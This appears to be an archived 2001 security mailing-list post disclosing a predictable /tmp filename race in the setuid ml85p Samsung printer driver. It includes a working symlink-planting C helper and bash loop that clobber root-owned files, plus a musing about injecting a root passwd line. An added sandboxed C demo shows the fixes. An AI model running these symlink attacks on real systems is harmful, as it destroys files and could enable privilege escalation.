ml85p - driver for Samsung ML-85G GDI printers seems to use /tmp insecurely. It seems to use the time() function to determine the /tmp file's name.

[root@linux exp]# strings /usr/bin/ml85p | grep tmp
/tmp/ml85g%d

[401070dd] iopl(0x3)                                              = 0
[400cf2bd] time(NULL)                                             = 994462668
[40100cbf] brk(0)                                                 = 0x8064544
[40100cbf] brk(0x80646c4)                                         = 0x80646c4
[40100cbf] brk(0x8065000)                                         = 0x8065000
[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

TIME(2)                    Linux Programmer's Manual                   TIME(2)

NAME
       time - get time in seconds

SYNOPSIS
       #include <time.h>

       time_t time(time_t *t);

DESCRIPTION
       time returns the time since the Epoch (00:00:00 UTC, January 1, 1970),
       measured in seconds.

[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462666
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462667
[d0tslash@linux d0tslash]$ ln -s /etc/test /tmp/ml85g994462668

This is trivial... root must run the following command.

[root@linux exp]# /usr/bin/ml85p -s

  -s   simulate the printing process, but write the compressed output to a
       /tmp/ml85xxxxxxxx file, where the filename suffix is the current time
       in time_t units (seconds since 12/31/1970).

As you can see, this is the one that hits us...

[400fa484] open("/tmp/ml85g994462668", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3

Oh how nice, truncation flag...

       O_TRUNC
              If the file already exists and is a regular file and the open
              mode allows writing (i.e., is O_RDWR or O_WRONLY) it will be
              truncated to length 0.
[root@linux exp]# ls -al /tmp | grep ml
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462665
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462666 -> /etc/test
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462667 -> /etc/test
lrwxrwxrwx    1 d0tslash d0tslash        9 Jul  6 19:37 ml85g994462668 -> /etc/test
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462669
-rw-r--r--    1 root     root            0 Jul  6 19:37 ml85g994462670

[d0tslash@linux d0tslash]$ ls -al /etc/test
-rw-r--r--    1 root     root            0 Jul  6 19:37 /etc/test

I am not sure what other OSs pick for permissions by default... Mandrake seems to not allow user access by default... I don't know what group you need to be in to use this feature.

[d0tslash@linux d0tslash]$ /usr/bin/ml85p
bash: /usr/bin/ml85p: Permission denied
[d0tslash@linux d0tslash]$ ls -al /usr/bin/ml85p
-rwsr-x---    1 root     sys         11676 Mar 30 11:43 /usr/bin/ml85p*

For shits and giggles, let's see what happens if it's got bad perms.

[root@linux exp]# chmod 4755 /usr/bin/ml85p

In which case the results are as follows:

[d0tslash@linux d0tslash]$ /usr/bin/ml85p -s   (several times)
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463605
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463607
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463608
-rw-r--r--    1 root     d0tslash        0 Jul  6 19:53 ml85g994463609

[d0tslash@linux d0tslash]$ cat ml85p-exp.c
// usage: ln -s /etc/oops /tmp/ml85g`./ml85p-exp [offset]`
// prints the time_t value <offset> seconds from now (default 30), i.e. the
// suffix ml85p will append to /tmp/ml85g if root runs it at that second
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(int argc, char **argv)
{
    long offset = (argc > 1) ? atol(argv[1]) : 30;
    long x = (long)time(NULL) + offset;
    printf("%ld\n", x);
    return 0;
}

[d0tslash@linux d0tslash]$ cat ml85p.sh
#!/bin/bash
# krfinisterreat_private
# plant a symlink for every second in the window now+<low> .. now+<hi>
if [ $# -ne 2 ]; then
    echo "usage: $0 <low> <hi>"
    exit 1
fi
L=$1
H=$2
while [ "$L" -lt "$H" ]
do
    ln -s /etc/oops /tmp/ml85g`./ml85p-exp $L`
    let L=L+1
done

The following file is created.

-rw-r--r--    1 root     d0tslash        0 Jul  6 20:18 /etc/oops

Not sure what use this is short of clobbering files...
Since the output is sent to this file, it may be possible to print "owned::0:0:root:/root:/bin/bash" to this driver and it may append it to the file in /tmp... I am not sure though... just an idea.

-KF
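Added example (not part of KF's post, and not ml85p's own code): the open() pattern visible in the ltrace above, reproduced in a private scratch directory next to the two fixes a driver author would apply. An unprivileged "attacker" plants symlinks for a few guessed time() values, exactly as ml85p.sh does; the "root" open with O_CREAT|O_TRUNC and a time()-derived name follows the link and truncates the target, while the same name opened with O_EXCL|O_NOFOLLOW is refused, and mkstemp() avoids the predictable name altogether. The directory name, the "victim" file and its passwd-style content are constructed test data; no real system file is touched.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Outcome of one run, so each piece can be checked separately. */
struct demo_result {
    int  victim_truncated_by_predictable; /* 1 if O_CREAT|O_TRUNC followed the planted symlink */
    int  exclusive_fd;                    /* fd from the O_EXCL open; expected -1 */
    int  exclusive_errno;                 /* errno from that open; expected EEXIST */
    long victim_size_after_exclusive;     /* expected: original length, untouched */
    int  mkstemp_fd;                      /* expected >= 0 */
};

/* The pattern from the ltrace: name derived from time(), O_TRUNC, no O_EXCL.
 * A symlink anyone planted at that name is followed and its target truncated. */
int open_predictable(const char *dir, time_t stamp, char *path, size_t len)
{
    snprintf(path, len, "%s/ml85g%ld", dir, (long)stamp);
    return open(path, O_RDWR | O_CREAT | O_TRUNC, 0666);
}

/* Same naming, but O_EXCL fails if anything (a symlink included) already exists
 * there and O_NOFOLLOW refuses symlinks outright; 0600 drops the world-readable mode. */
int open_exclusive(const char *dir, time_t stamp, char *path, size_t len)
{
    snprintf(path, len, "%s/ml85g%ld", dir, (long)stamp);
    return open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Preferred fix: unpredictable suffix plus O_EXCL, done by libc. */
int open_mkstemp(const char *dir, char *path, size_t len)
{
    snprintf(path, len, "%s/ml85g.XXXXXX", dir);
    return mkstemp(path);
}

static long file_size(const char *p)
{
    struct stat st;
    return stat(p, &st) == 0 ? (long)st.st_size : -1;
}

static void write_file(const char *p, const char *data)
{
    int fd = open(p, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return;
    if (write(fd, data, strlen(data)) < 0) { /* best effort in the demo */ }
    close(fd);
}

/* Stages the race: attacker guesses the next few time() values and plants links
 * (constructed scenario), then the "privileged" program opens its spool file. */
struct demo_result run_demo(void)
{
    struct demo_result r = {0, -2, 0, -1, -2};
    char dir_tmp[] = "/tmp/ml85demo.XXXXXX";   /* scratch dir, assumed writable */
    char dir_cwd[] = "./ml85demo.XXXXXX";      /* fallback if /tmp is unavailable */
    const char *dir = mkdtemp(dir_tmp) ? dir_tmp : mkdtemp(dir_cwd);
    char victim[256], link[256], path[256];
    const char *secret = "root:x:0:0:root:/root:/bin/bash\n"; /* constructed, 32 bytes */
    time_t now = time(NULL);
    int fd, i;

    if (dir == NULL) return r;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    write_file(victim, secret);

    for (i = 0; i < 3; i++) {                  /* attacker: ml85g<now>..<now+2> -> victim */
        snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)(now + i));
        if (symlink(victim, link) != 0) { /* already present: fine */ }
    }

    fd = open_predictable(dir, now, path, sizeof path);   /* vulnerable open */
    if (fd >= 0) close(fd);
    r.victim_truncated_by_predictable = (file_size(victim) == 0);

    write_file(victim, secret);                           /* restore, retry hardened */
    r.exclusive_fd = open_exclusive(dir, now, path, sizeof path);
    r.exclusive_errno = (r.exclusive_fd < 0) ? errno : 0;
    if (r.exclusive_fd >= 0) close(r.exclusive_fd);
    r.victim_size_after_exclusive = file_size(victim);

    r.mkstemp_fd = open_mkstemp(dir, path, sizeof path);
    if (r.mkstemp_fd >= 0) { close(r.mkstemp_fd); unlink(path); }

    for (i = 0; i < 3; i++) {                  /* cleanup */
        snprintf(link, sizeof link, "%s/ml85g%ld", dir, (long)(now + i));
        unlink(link);
    }
    unlink(victim);
    rmdir(dir);
    return r;
}

int main(void)
{
    struct demo_result r = run_demo();
    printf("predictable name + O_TRUNC truncated victim: %d\n", r.victim_truncated_by_predictable);
    printf("O_EXCL|O_NOFOLLOW open: fd=%d (%s)\n", r.exclusive_fd,
           r.exclusive_fd < 0 ? strerror(r.exclusive_errno) : "opened");
    printf("victim size after hardened attempt: %ld\n", r.victim_size_after_exclusive);
    printf("mkstemp ok: %d\n", r.mkstemp_fd >= 0);
    return 0;
}
```

The same symlink that defeats the first open is what makes the second one fail with EEXIST: O_EXCL is evaluated against the name, not the target, so the planted link is never followed. mkstemp() is still the better fix, because it also removes the guessable name the brute-force loop in the post depends on.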
This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 09:45:27 PDT